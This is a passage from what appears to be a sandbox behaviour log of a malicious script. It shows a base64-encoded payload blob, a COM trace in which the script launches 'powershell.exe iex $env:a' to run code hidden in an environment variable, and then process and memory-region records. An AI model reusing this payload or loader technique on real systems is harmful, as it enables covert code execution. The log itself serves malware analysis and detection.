vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr", varVal2=0x2cd940), [1]=0x18a6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="a", varVal2=0x2cd940)), rgdispidNamedArgs=([0]=0x18a6b0*=-3), cArgs=0x2, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x18a660*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a654*=0x0) returned 0x0 [0038.644] IUnknown:Release (This=0x2cdf80) returned 0x1 [0038.644] IDispatch:GetIDsOfNames (in: This=0x2cd890, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18a7d0*="Run", cNames=0x1, lcid=0x409, rgDispId=0x18a680 | out: rgDispId=0x18a680*=1000) returned 0x0 [0038.644] IUnknown:AddRef (This=0x2cd890) returned 0x2 [0038.644] IDispatch:Invoke (in: This=0x2cd890, dispIdMember=1000, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18a568*(rgvarg=([0]=0x18a580*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), [1]=0x18a598*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [2]=0x18a5b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe iex $env:a", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x18aaa8, pExcepInfo=0x18a510, puArgErr=0x18a504 | out: pDispParams=0x18a568*(rgvarg=([0]=0x18a580*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), [1]=0x18a598*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [2]=0x18a5b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe iex $env:a", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x18aaa8*(varType=0x3, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a, varVal2=0x2cd860), pExcepInfo=0x18a510*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a504*=0x0) returned 0x0 [0047.674] IUnknown:Release (This=0x2cd890) returned 0x1 [0047.674] IDispatchEx:GetDispId (in: This=0x3971e0, bstrName="close", grfdex=0x10000001, pid=0x18a790 | out: pid=0x18a790*=3) returned 0x0 [0047.674] IActiveScript:GetScriptDispatch (in: This=0x2cd250, pstrItemName="window", ppdisp=0x18a4f8 | out: ppdisp=0x18a4f8*=0x2ce030) returned 0x0 [0047.674] GetCurrentThreadId () returned 0xa40 [0047.674] IUnknown:QueryInterface (in: This=0x2ce030, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a480 | out: ppvObject=0x18a480*=0x2ce030) returned 0x0 [0047.674] IDispatchEx:GetDispId (in: This=0x2ce030, bstrName="close", grfdex=0x10000001, pid=0x18a508 | out: pid=0x18a508*=-1) returned 0x80020006 [0047.674] IUnknown:Release (This=0x2ce030) returned 0x1 [0047.674] IUnknown:Release (This=0x2ce030) returned 0x1 [0047.674] IActiveScript:GetScriptDispatch (in: This=0x2cea40, pstrItemName="window", ppdisp=0x18a4f8 | out: ppdisp=0x18a4f8*=0x2cd7c0) returned 0x0 [0047.674] GetCurrentThreadId () returned 0xa40 [0047.674] IUnknown:QueryInterface (in: This=0x2cd7c0, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a480 | out: ppvObject=0x18a480*=0x2cd7c0) returned 0x0 [0047.674] IDispatchEx:GetDispId (in: This=0x2cd7c0, bstrName="close", grfdex=0x10000001, pid=0x18a508 | out: pid=0x18a508*=-1) returned 0x80020006 [0047.674] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0047.674] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0047.675] IUnknown:AddRef (This=0x3971e0) returned 0xf [0047.675] IUnknown:AddRef (This=0x3bfc00) returned 0x5 [0047.675] IUnknown:QueryInterface (in: This=0x3bfc00, riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6d0 | out: ppvObject=0x19e6d0*=0x3bfc00) returned 0x0 [0047.675] IUnknown:Release (This=0x3bfc00) returned 0x5 [0047.675] IDispatchEx:InvokeEx (in: This=0x3971e0, id=3, lcid=0x1, wFlags=0x1, pdp=0x18a6c0*(rgvarg=0x2cd0e0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x0, pei=0x18a6e0, pspCaller=0x19e6a0 | out: pdp=0x18a6c0*(rgvarg=0x2cd0e0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x0, pei=0x18a6e0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0 [0047.675] IUnknown:Release (This=0x3971e0) returned 0xe [0047.675] GetCurrentThreadId () returned 0xa40 [0047.675] IActiveScriptSite:OnLeaveScript (This=0x3bfc00) returned 0x0 [0047.676] ISystemDebugEventFire:IsActive (This=0x3a5b40) returned 0x1 [0047.676] IUnknown:Release (This=0x3bfc00) returned 0x4 [0047.676] IUnknown:Release (This=0x3bfc00) returned 0x3 [0047.678] IUnknown:Release (This=0x397550) returned 0x1 [0047.678] GetCurrentThreadId () returned 0xa40 [0047.678] IActiveScriptSite:OnLeaveScript (This=0x3aaf30) returned 0x0 [0047.679] ISystemDebugEventFire:IsActive (This=0x3a56e0) returned 0x1 [0047.679] IUnknown:Release (This=0x3aaf30) returned 0x5 [0047.679] IUnknown:Release (This=0x3aaf30) returned 0x4 [0047.679] IActiveScript:SetScriptState (This=0x2cb2f0, ss=3) returned 0x8000ffff [0047.679] GetCurrentThreadId () returned 0xa40 [0047.679] IUnknown:Release (This=0x2cb338) returned 0x3 [0047.679] IUnknown:Release (This=0x2cb2f8) returned 0x2 [0047.679] IActiveScript:Close (This=0x2cb2f0) returned 0x0 [0047.679] GetCurrentThreadId () returned 0xa40 [0047.679] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f2c8 | out: ppv=0x18f2c8*=0x36ab70) returned 0x0 [0047.679] IUnknown:Release (This=0x3971e0) returned 0xd [0047.679] IUnknown:Release (This=0x397550) returned 0x0 [0047.679] IUnknown:Release (This=0x3971e0) returned 0xc [0047.680] IUnknown:Release (This=0x3971e0) returned 0xb [0047.680] IUnknown:Release (This=0x3971e0) returned 0xa [0047.680] IUnknown:Release (This=0x3971e0) returned 0x9 [0047.680] MulDiv (nNumber=25, nNumerator=100, nDenominator=43) returned 58 [0047.680] IUnknown:Release (This=0x36ab70) returned 0x1 [0047.680] GetTickCount () returned 0x13ca2 [0047.680] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f2c8 | out: ppv=0x18f2c8*=0x36ab70) returned 0x0 [0047.680] MulDiv (nNumber=0, nNumerator=100, nDenominator=18) returned 0 [0047.680] IUnknown:Release (This=0x36ab70) returned 0x1 [0047.680] GetTickCount () returned 0x13ca2 [0047.680] IUnknown:Release (This=0x3aaf50) returned 0x3 [0047.680] ISystemDebugEventFire:EndSession (This=0x3a56e0) returned 0x0 [0047.680] IUnknown:Release (This=0x3a56e0) returned 0x1 [0047.680] GetUserDefaultLCID () returned 0x409 [0047.680] GetACP () returned 0x4e4 [0047.680] IUnknown:Release (This=0x3971e0) returned 0x8 [0047.680] IUnknown:Release (This=0x3aaf40) returned 0x2 [0047.680] IUnknown:Release (This=0x3a56e0) returned 0x0 [0047.680] IActiveScriptSite:OnScriptTerminate (This=0x3aaf30, pvarResult=0x4, pexcepinfo=0x0) returned 0x0 [0047.681] IUnknown:Release (This=0x3aaf30) returned 0x1 [0047.681] IUnknown:Release (This=0x2cb2f0) returned 0x0 [0047.682] IActiveScript:SetScriptState (This=0x2cea40, ss=3) returned 0x8000ffff [0047.682] GetCurrentThreadId () returned 0xa40 [0047.682] IActiveScript:SetScriptState (This=0x2cea40, ss=3) returned 0x8000ffff [0047.682] GetCurrentThreadId () returned 0xa40 [0047.682] IUnknown:Release (This=0x2cea88) returned 0x3 [0047.682] IUnknown:Release (This=0x2cea48) returned 0x2 [0047.682] IActiveScript:Close (This=0x2cea40) returned 0x0 [0047.682] GetCurrentThreadId () returned 0xa40 [0047.682] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f5f8 | out: ppv=0x18f5f8*=0x36ab70) returned 0x0 [0047.683] IUnknown:Release (This=0x3971e0) returned 0x7 [0047.683] IUnknown:Release (This=0x3971e0) returned 0x6 [0047.683] IUnknown:Release (This=0x3971e0) returned 0x5 [0047.685] MulDiv (nNumber=13, nNumerator=100, nDenominator=18) returned 72 [0047.685] IUnknown:Release (This=0x36ab70) returned 0x1 [0047.685] GetTickCount () returned 0x13ca2 [0047.685] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f5f8 | out: ppv=0x18f5f8*=0x36ab70) returned 0x0 [0047.685] MulDiv (nNumber=0, nNumerator=100, nDenominator=5) returned 0 [0047.685] IUnknown:Release (This=0x36ab70) returned 0x1 [0047.685] GetTickCount () returned 0x13ca2 [0047.685] IUnknown:Release (This=0x3bfc20) returned 0x2 [0047.685] ISystemDebugEventFire:EndSession (This=0x3a5b40) returned 0x0 [0047.685] IUnknown:Release (This=0x3a5b40) returned 0x1 [0047.685] GetUserDefaultLCID () returned 0x409 [0047.685] GetACP () returned 0x4e4 [0047.685] IUnknown:Release (This=0x3971e0) returned 0x4 [0047.685] IUnknown:Release (This=0x3a5b40) returned 0x0 [0047.685] IActiveScriptSite:OnScriptTerminate (This=0x3bfc00, pvarResult=0x4, pexcepinfo=0x1f005d0007) returned 0x0 [0047.685] IUnknown:Release (This=0x3bfc00) returned 0x1 [0047.685] IUnknown:Release (This=0x2cea40) returned 0x0 [0047.686] IUnknown:Release (This=0x2cd298) returned 0x2 [0047.686] IUnknown:Release (This=0x2cd258) returned 0x1 [0047.686] IActiveScript:Close (This=0x2cd250) returned 0x0 [0047.686] GetCurrentThreadId () returned 0xa40 [0047.686] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f5f8 | out: ppv=0x18f5f8*=0x36ab70) returned 0x0 [0047.686] IUnknown:Release (This=0x3971e0) returned 0x3 [0047.686] IUnknown:Release (This=0x3971e0) returned 0x2 [0047.686] IUnknown:Release (This=0x3971e0) returned 0x1 [0047.686] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7fefea0a1b0, dwCookie=0x100) returned 0x0 [0047.686] IUnknown:Release (This=0x2cbce0) returned 0x1 [0047.686] IUnknown:Release (This=0x36ab70) returned 0x1 [0047.686] IUnknown:Release (This=0x36ab70) returned 0x0 [0047.686] IUnknown:Release (This=0x3bfb70) returned 0x3 [0047.686] ISystemDebugEventFire:EndSession (This=0x3a5590) returned 0x0 [0047.686] IUnknown:Release (This=0x3a5590) returned 0x1 [0047.686] GetUserDefaultLCID () returned 0x409 [0047.686] GetACP () returned 0x4e4 [0047.686] IUnknown:Release (This=0x3971e0) returned 0x0 [0047.686] IUnknown:Release (This=0x3bfb60) returned 0x2 [0047.686] IUnknown:Release (This=0x3a5590) returned 0x0 [0047.686] IActiveScriptSite:OnScriptTerminate (This=0x3bfb50, pvarResult=0x4, pexcepinfo=0x21008e0009) returned 0x0 [0047.686] IUnknown:Release (This=0x3bfb50) returned 0x1 [0047.686] IUnknown:Release (This=0x2cd250) returned 0x0 [0047.691] DllCanUnloadNow () returned 0x1 [0047.693] GetProcAddress (hModule=0x7fefef30000, lpProcName="UnregisterTraceGuids") returned 0x773a3c80 [0047.693] EtwEventUnregister (RegHandle=0x1400010001) returned 0x0 [0047.693] EtwEventUnregister (RegHandle=0x1500010001) returned 0x0 Thread: id = 4 os_tid = 0xa44 Thread: id = 5 os_tid = 0xa48 Thread: id = 6 os_tid = 0xa4c Thread: id = 7 os_tid = 0xa50 Thread: id = 8 os_tid = 0xa54 Thread: id = 10 os_tid = 0xa60 Process: id = "3" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x63edd000" os_pid = "0xa58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" iex $env:a" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010611" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 370 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 371 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 372 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 373 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 374 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 375 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 376 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 377 start_va = 0x22550000 end_va = 0x225c1fff entry_point = 0x22550000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 378 start_va = 0x77380000 end_va = 0x77528fff entry_point = 0x77380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 379 start_va = 0x77560000 end_va = 0x776dffff entry_point = 0x77560000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 380 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 381 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 382 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 383 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 384 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 385 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 386 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 387 start_va = 0x390000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 388 start_va = 0x73a70000 end_va = 0x73acbfff entry_point = 0x73aaf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 389 start_va = 0x73ad0000 end_va = 0x73b0efff entry_point = 0x73afde78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 390 start_va = 0x73b40000 end_va = 0x73b47fff entry_point = 0x73b420f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 391 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 392 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 393 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 394 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 395 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 396 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 397 start_va = 0x74b50000 end_va = 0x74b99fff entry_point = 0x74b50000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 398 start_va = 0x74ba0000 end_va = 0x74bb3fff entry_point = 0x74ba0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 399 start_va = 0x750b0000 end_va = 0x750bbfff entry_point = 0x750b10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 400 start_va = 0x750c0000 end_va = 0x7511ffff entry_point = 0x750da3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 401 start_va = 0x75120000 end_va = 0x7521ffff entry_point = 0x7513b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 402 start_va = 0x75240000 end_va = 0x75258fff entry_point = 0x75244975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 403 start_va = 0x75260000 end_va = 0x7530bfff entry_point = 0x7526a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 404 start_va = 0x75320000 end_va = 0x75365fff entry_point = 0x75327478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 405 start_va = 0x753c0000 end_va = 0x754affff entry_point = 0x753d0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 406 start_va = 0x754e0000 end_va = 0x7556ffff entry_point = 0x754f6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 407 start_va = 0x75570000 end_va = 0x756cbfff entry_point = 0x755bba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 408 start_va = 0x763e0000 end_va = 0x7646efff entry_point = 0x763e3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 409 start_va = 0x765b0000 end_va = 0x766bffff entry_point = 0x765c32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 410 start_va = 0x76750000 end_va = 0x76759fff entry_point = 0x767536a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 411 start_va = 0x76760000 end_va = 0x767fffff entry_point = 0x767749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 412 start_va = 0x76b30000 end_va = 0x76bccfff entry_point = 0x76b63fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 413 start_va = 0x77100000 end_va = 0x77156fff entry_point = 0x77119ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 414 start_va = 0x77160000 end_va = 0x77259fff entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 415 start_va = 0x77260000 end_va = 0x7737efff entry_point = 0x0 region_type = private name = "private_0x0000000077260000" filename = "" Region: id = 416 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 417 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 418 start_va = 0x640000 end_va = 0x7c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 419 start_va = 0x76a00000 end_va = 0x76acbfff entry_point = 0x76a0168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 420 start_va = 0x76ad0000 end_va = 0x76b2ffff entry_point = 0x76ae158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 421 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 422 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 423 start_va = 0xf0000 end_va = 0xf2fff entry_point = 0xf0000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 424 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 425 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 426 start_va = 0x2e0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 427 start_va = 0x7d0000 end_va = 0x950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 428 start_va = 0x960000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 429 start_va = 0x1d60000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 430 start_va = 0x1f30000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 431 start_va = 0x2040000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 432 start_va = 0x738b0000 end_va = 0x7392ffff entry_point = 0x738c37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 433 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 434 start_va = 0x1f40000 end_va = 0x201efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 435 start_va = 0x756d0000 end_va = 0x75752fff entry_point = 0x756d23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 436 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 437 start_va = 0x75790000 end_va = 0x763d9fff entry_point = 0x75811601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 438 start_va = 0x74a50000 end_va = 0x74a66fff entry_point = 0x74a50000 region_type = mapped_file name = "userenv.dll" filename = 